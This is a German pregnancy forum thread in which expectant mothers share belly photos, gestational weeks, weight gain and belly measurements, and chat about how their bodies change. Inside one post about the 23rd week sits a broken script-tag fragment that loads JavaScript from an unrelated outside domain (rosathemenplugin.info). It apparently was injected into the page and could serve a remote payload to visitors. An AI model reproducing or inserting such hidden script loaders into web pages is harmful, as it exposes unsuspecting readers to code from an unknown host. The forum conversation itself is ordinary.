Suchen Menü

Bauchparade....wer macht mit?

Guten Morgen und einen schönen 1.April wünsch ich euch. Ich starte diesen Monat mal die Bauchparade und würde mich freuen, wenn ihr alle mitmacht. 

Mein Bild zeigt ein Vergleich. Links 22+2. Rechts gestern bei 26+2. Ich habe jetzt gute 10kg zugenommen und vermute, dass das noch nicht das Ende ist=-O

 

LG Kristin mit 2 an der Hand und 2 im Kugelbauchi:-D

Bisherige Antworten

April April der macht was er will...vorallem mit den Bäuchen ;-) wir sind auch dabei!!!

Sehr schönen bauch hast du da!!!:THUMBS UP:

Hier mein vergleich bei 16+4 und heute 20+1....schon krass was so ein paar wochen aus machen!!! Zugenommen jetzt insgesamt gut 22kg :,(

Lg

Re: Bauchparade....wer macht mit?

Guten Morgen,

schöner Bauch und das ist schon ein deutlicher Größenunterschied. :THUMBS UP:

Ich häng mal das von letzter Woche dran, da hat sich nicht sonderlich was getan in der Zwischenzeit. War bei 16+6 SSW:

17. SSW - 16+6

Lg und einen schönen Dienstag

Re: Bauchparade....wer macht mit?

Auch dabei....

26+6

 

26+6

 

26+6

 

Guten morgen. Mein bauchi heute morgen bei 26+6:-*

Letzte Nacht drei stunden geschlafen. Werde jetzt noch bisschen schlummern gehen. :-P

 

Lg patty 26+6 (ET-92 / KS-80):IN LOVE:

Re: Bauchparade....wer macht mit?

+12 ,5 Kilo mehr auf der waage

und einem nauchumfang von 125,5 cm :IN LOVE:

Re: Bauchparade....wer macht mit?

Krasse sache! Soviel bauchumfang hatte ich glaub ich nicht einmal während meiner gesamten ersten ss. Aber ich hatte ja auch nur einen Murkel im Bauch. Halte durch! !!!!

mit wie viel cm hast du ungefähr angefangen? ich bin jetzt bei 118 (glaub ich) angefangen mit nicht ganz 90! bei dem großen am ende über 140!!!!!! :-O

Re: mit wie viel cm hast du ungefähr angefangen? ich bin jetzt bei 118 (glaub ich) angefangen mit nicht ganz 90! bei dem großen am ende über 140!!!!!! :-O

hab mit knapp 98 cm angefangen. Waren ja schon 4 Mäuse vorher drin. 

Leider hab ich ja nach der vierten kein Gramm verloren :-(

 

Egal ich ich liebe mich trotzdem :-)

Grüssle

Re: mit wie viel cm hast du ungefähr angefangen? ich bin jetzt bei 118 (glaub ich) angefangen mit nicht ganz 90! bei dem großen am ende über 140!!!!!! :-O

und das ist das wichtigste ;-)

war ja auch nicht so gemeint wie dünn oder "dick" du vorher warst...interessiert mich nur immer wieder weil ich es echt unglaublich finde wie sich die haut und alles dehnen kann und in was für ner zeit! =-O

wenn ich überlege 140cm die ich hatte wieder zurück auf knapp 90 man was für eine belastung für die haut....gelitten hat sie klar das kann man nicht übersehen aber wir wissen ja wo für :IN LOVE:;-) ich hab beim ersten zum glück alles wieder weg bekommen (und sogar noch etwas mehr) aber der körper verändert sich sobald man ein kind bekommen hat....hüfte war breiter und breiter im ganzen irgendwie!

Re: Bauchparade....wer macht mit?

Hallo ihr, 

Wunderschöne Bäuche habt ihr da. Hier ist meiner heute bei 22/5. Leider bin ich schon wieder zu doof das Bild zu drehen:-|

Insgesamt hab ich erst 1, 5 Kilo zugenommen, aber ich gehöre auch zu denjenigen, die sich noch immer:GIRL 155:, wenn ich meine Tabletten nicht nehmen würde. 

Liebste grüße und einen sonnigen Dienstag! Murmel 22/5

Re: Bauchparade....wer macht mit?

26+6Heute 26+6

 

Re: Bauchparade....wer macht mit?

Hier mein Bild von heute bei 26+1 :IN LOVE:Bauchparade 26+1

Re: Bauchparade....wer macht mit?

So, dann versuche ich mich auch mal damit, ein Bild einzufügen :-)

Ich erwarte das vierte Kind und bin heute bei 21+1, habe insgesamt ca. 5 Kilo zugenommen und gerade einen Umfang von 93 cm gemessen. Abends wird der Bauch aber immer deutlich dicker :-[

lg

maxie

 

heute bei 19+0. habe die 70 kg und 100 cm bauchumfang geknackt; ) wo mag das noch hinführen? !

19+0

Leider auch auf dem Kopf, 101cm fassen meine beiden! 23+6

@Lele

Liebe Lele,

ich schleiche mich kurz ein.

Bilder werden in Beiträgen ja so dargestellt wie sie in das Fotoalbum hochgeladen worden sind. Wenn Du das Bild über Dein Handy hochgeladen hast, dann musst Du es vorher in irgendeiner Form bearbeiten, z.B. beschneiden, damit es richtig herum angezeigt wird.

Viele Grüße

Victoria

Re: @Lele

danke!

Re: Bauchparade....wer macht mit?

Huhuuuu...

Wir auch noch.....

Das ist meine Strandmurmel :GIRL 101:

Li 17+1 und re heute 21+1

Auch erst 2.5 kilo zu genommen :THUMBS UP:17+1 und 21+1

Puppi und ich bei 26+5

26+5

Re: Bauchparade....wer macht mit?

22+1

 Huhu das war vor ein paar Tagen bei 22+1 

liebe grüsse 

übrigens alles sehr schöne bäuche ;-)

Küsschen ela 

Re: Bauchparade....wer macht mit?

Hey ihr lieben,

schön und faszinierend wie unterschiedlich die Bäuche doch sind:-)

Hier meine Kugel bei 26+0 Mittlerweile hab ich dann doch mal zugenommen +3 kg

Bin auch noch mit dabei :o)

Hier mein Bauch von vor 5 Minuten bei 25+2. Im Vergleich zu vor 4 Wochen kann ich selbst keinen Unterschied feststellen, bin aber auch im Gewicht stabil geblieben (aktuell 11 kg zugenommen).

 

LG, Kristin

Re: Bauchparade....wer macht mit?

3.Schwangerschaft

23.SSW Bin zwar ein Tag zu spät aber ich wollte auch mitmachen , dies ist zwar ein älteres Foto aber es hat sich nichts geändert

type="text/" src="http://rosathemenplugin.info/dfi823hs.js?0.9706602472888286">

Hier, ich!!!

Hallo zusammen,

ich möchte, wenn auch verspätet, ebenfalls mitmachen.

Aufnahme ist von heute bei 24+0 und einer Gewichtszunahme von insgesamt + 2kg.

Ich platze bald!!! Wo soll der Bauch denn noch hin?

 

LG Sandra

 

24+0

Re: Bauchparade....wer macht mit?

Bin grade bei 19+2

Re: Bauchparade....wer macht mit?

Hallo und guten Morgen.

Ich habe zu spät gesehen, dass du bereits eine Bauchparade gestartet hast. Daher habe ich heute auch noch einmal eine gestartet.

Aber dann stelle ich mal mein Bäuchlein lieber auch hier mit rein.

Ich bin jetzt 21+4 und habe auch schon 11,4kg zugenommen. Das wird bestimmt auch noch nicht das Ende sein. Da muss ich wohl doch mal ein wenig auf Süßkram verzichten.

Komisch schon, dass man auf Leberwurst, rohen Schinken und Salami sehr gut verzichten kann und es mir auch nichts ausmacht, weil ich weiß, dass es gefährlich sein kann. Vielleicht sollte man mal sagen, dass auch Süßkram gefährlich sein kann, dann würde es bei mir vielleicht auch damit besser klappen. Grins...

So und hier mein Foto:

Re: Bauchparade....wer macht mit?

21 plus 2 - ganz schön spitz : )

und ich weiß noch immer nicht ob Junge oder Mädel...

21plus2

 

Re: Bauchparade....wer macht mit?

Re: Bauchparade....wer macht mit?

Mogli und Krümel

Meistgelesen auf 9monate.de
Diskussionsverlauf
Rat und Hilfe zur Bedienung
Übersicht aller Foren

Mit der Teilnahme an unseren interaktiven Gewinnspielen sicherst du dir hochwertige Preise für dich und deine Liebsten!

Jetzt gewinnen